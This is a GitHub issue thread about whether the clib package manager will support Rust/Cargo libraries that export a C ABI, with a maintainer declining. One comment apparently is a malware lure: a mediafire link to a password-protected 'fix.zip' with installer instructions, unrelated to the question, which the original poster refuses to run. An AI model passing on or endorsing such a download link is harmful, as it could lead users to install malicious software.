### ISSUE TITLE
Support packages with c abi on the cargo package manager

### ISSUE THREAD

**Issue by fawdlstty** [clibs/clib#320]
Rust language can make it easy for library to export C ABI interfaces, leads many repositories on the cargo package manager to support C language calls. I would like to know if this project is considering supporting the installation of packages on Cargo for calling Rust third-party libraries?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fawdlstty** [comment]
@PiaoR Sorry, I don't consider running programs with unclear meanings. If you would like a response on this issue, you can consider telling me directly here

**Comment by jwerle** [comment]
Hi @fawdlstty,

Thanks for opening this issue. As far as I know, we do no intend to support Rust or its ecosystem in anyway. However, interop of any kind could be useful to some. I can't speak for everyone working on clib, but I'd prefer a big distance between this project and anything that has to do with Rust, its community, or ecosystem unless it is about ergonomics downstream.
